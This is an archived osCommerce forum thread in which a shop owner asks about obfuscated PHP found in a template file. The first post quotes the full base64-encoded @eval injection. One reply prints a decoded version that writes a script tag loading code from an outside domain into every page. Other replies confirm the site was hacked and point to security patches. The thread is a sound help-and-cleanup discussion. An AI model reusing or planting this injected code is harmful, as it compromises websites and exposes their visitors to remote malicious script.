kevinhuynh Posted July 28, 2012 Share Posted July 28, 2012 I found this code in template_bottom file. I don't know what is this script mean. But when it is available my ssl is not working well. The lock of ssl don't show. When I remove it the ssl in mysite is show the lock for ssl. Here is the code: <?php @eval(@base64_decode("QGV2YWwoQGJhc2U2NF9kZWNvZGUoImFXWW9JV1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25YMFprTXprd01tVXlZVEF6WW1Ga01EazJNelk1T0RZeU9EWXlaR1psTlRaaE15Y3BLWHRtZFc1amRHbHZiaUJmUm1Rek9UQXlaVEpoTUROaVlXUXdPVFl6TmprNE5qSTROakprWm1VMU5tRXpLQ1JmVmpFellqVmlMQ1JmVmpnd05UUmlLWHNrWDFZell6WmxNRDFBY21GM2RYSnNaR1ZqYjJSbEtFQmlZWE5sTmpSZlpHVmpiMlJsS0NSZlZqZ3dOVFJpS1NrN0pGOVdNRFJsTWpnOVFHSmhjMlUyTkY5a1pXTnZaR1VvSkY5V01UTmlOV0lwT3lSZlZqaGpNV016UFhOMGNteGxiaWdrWDFZell6WmxNQ2s3SkY5V1pEZ3dNVEU5Wm14dmIzSW9KRjlXT0dNeFl6TXZNaWs3SkY5V1ptSTNaREE5SWlJN1ptOXlLQ1JmVmpnMk5XTXdQVEE3SkY5V09EWTFZekE4YzNSeWJHVnVLQ1JmVmpBMFpUSTRLVHNrWDFZNE5qVmpNQ3NyS1hza1gxWXpOekl3WWoxemRXSnpkSElvSkY5V01EUmxNamdzSkY5V09EWTFZekFzTVNrN0pGOVdPV1EzTTJROWMzUnljRzl6S0NSZlZqTmpObVV3TENSZlZqTTNNakJpS1R0cFppZ2tYMVk1WkRjelpEMDlQV1poYkhObEtTUmZWbVppTjJRd0xqMGtYMVl6TnpJd1lqdGxiSE5sZTJsbUtDUmZWamxrTnpOa1BpUmZWbVE0TURFeEtYc2tYMVl6T0dFMVpUMGtYMVk1WkRjelpDMGtYMVprT0RBeE1Uc2tYMVpoTjJZNFpqMXliM1Z1WkNnb0pGOVdaRGd3TVRFdE1Ta3RKRjlXTXpoaE5XVXBPMzFsYkhObGV5UmZWak00WVRWbFBTUmZWbVE0TURFeExTUmZWamxrTnpOa095UmZWbUUzWmpobVBYSnZkVzVrS0Nna1gxWmtPREF4TVMweEtTc2tYMVl6T0dFMVpTazdmU1JmVm1ZME1UWmhQWE4xWW5OMGNpZ2tYMVl6WXpabE1Dd2tYMVpoTjJZNFppd3hLVHNrWDFabVlqZGtNQzQ5SkY5V1pqUXhObUU3ZlgxQVpYWmhiQ2drWDFabVlqZGtNQ2s3ZlgwPSIpKTsKX0ZkMzkwMmUyYTAzYmFkMDk2MzY5ODYyODYyZGZlNTZhMygiUHo0TkNqdy9jR2h3RFFwbFkyaHZJQ2M4YzJOeWFYQjBJSE55WXowaWFIUjBjRG92TDNkM2R5NWhkWFJvWlc1MGFXTmhkR1YzWldJdVkyOXRMMjl6WTI5dGJXVnlZMlV2YVc1a1pYZ3VjR2h3SWlBK1BDOXpZM0pwY0hRK0p6c05DbVZqYUc4Z0lseHVJanNOQ2o4K0RRbz0iLCJKVE15SlRNMCIpOw==")); ?> My website is shown in browswer : <script src="http://www.authenticateweb.com/oscommerce/index.php" ></script> I don't know the meaning that they insert this code to the site. I found some topic that they said it means hacked? any advise ..thank so much Link to comment Share on other sites More sharing options...
♥kymation Posted July 28, 2012 Share Posted July 28, 2012 Yes, you've been hacked. Secure your site with a password and then clean up the mess. Add the recommended security patches for your version before you reopen the site. Regards Jim See my profile for a list of my addons and ways to get support. Link to comment Share on other sites More sharing options...
♥geoffreywalton Posted July 28, 2012 Share Posted July 28, 2012 Beat me to it!! Cheers G http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ http://www.oscommerce.com/forums/index.php?showtopic=340995 These 2 show how to secure your site but as it has already been hacked you need to restore to a clean state and apply the fixes or find the changes and clean them out and apply the security fixes. Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>. Link to comment Share on other sites More sharing options...
♥FWR Media Posted July 28, 2012 Share Posted July 28, 2012 I don't know the meaning that they insert this code to the site. I found some topic that they said it means hacked? any advise ..thank so much Definate hack. All I can make of it with a quick look is .. <?php if(!function_exists('_Fd3902e2a03bad096369862862dfe56a3')){ function _Fd3902e2a03bad096369862862dfe56a3($_V13b5b,$_V8054b) { $_V3c6e0=@rawurldecode(@base64_decode($_V8054b)); $_V04e28=@base64_decode($_V13b5b); $_V8c1c3=strlen($_V3c6e0); $_Vd8011=floor($_V8c1c3/2); $_Vfb7d0=""; for($_V865c0=0; $_V865c0<strlen($_V04e28); $_V865c0++) { $_V3720b=substr($_V04e28,$_V865c0,1); $_V9d73d=strpos($_V3c6e0,$_V3720b); if($_V9d73d===false) $_Vfb7d0.=$_V3720b; else { if($_V9d73d>$_Vd8011){ $_V38a5e=$_V9d73d-$_Vd8011; $_Va7f8f=round(($_Vd8011-1)-$_V38a5e); } else { $_V38a5e=$_Vd8011-$_V9d73d; $_Va7f8f=round(($_Vd8011-1)+$_V38a5e); } $_Vf416a=substr($_V3c6e0,$_Va7f8f,1); $_Vfb7d0.=$_Vf416a; } } @eval($_Vfb7d0);}} ?> The function calls: - <?php echo '<script src="[http://]www(dot)authenticateweb(dot)com/oscommerce/index.php" ></script>'; echo "\n"; ?> The last bit I only got some of but you can see the web address. DON'T VISIT THAT LINK, IT'S MOST LIKELY DANGEROUS Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls KissMT Dynamic SEO Meta & Canonical Header Tags KissER Error Handling and Debugging KissIT Image Thumbnailer Security Pro - Querystring protection against hackers ( a KISS contribution ) If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work. Link to comment Share on other sites More sharing options...
burt Posted July 28, 2012 Share Posted July 28, 2012 I have seen this same code in a virgin download of a template from the "monstrous" site. I think, though am not sure, that it is an attempt by the template author to track usage. gary Link to comment Share on other sites More sharing options...
♥Biancoblu Posted July 29, 2012 Share Posted July 29, 2012 A google search shows the same web address but with other carts (prestashop, zencart, virtuemart, magento). http://www.google.com/#q=site:www.authenticateweb.com&hl=en&prmd=imvns&filter=0&bav=on.2,or.r_gc.r_pw.r_qf.&fp=6469df5417c526af&biw=1920&bih=845 ~ Don't mistake my kindness for weakness ~ Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.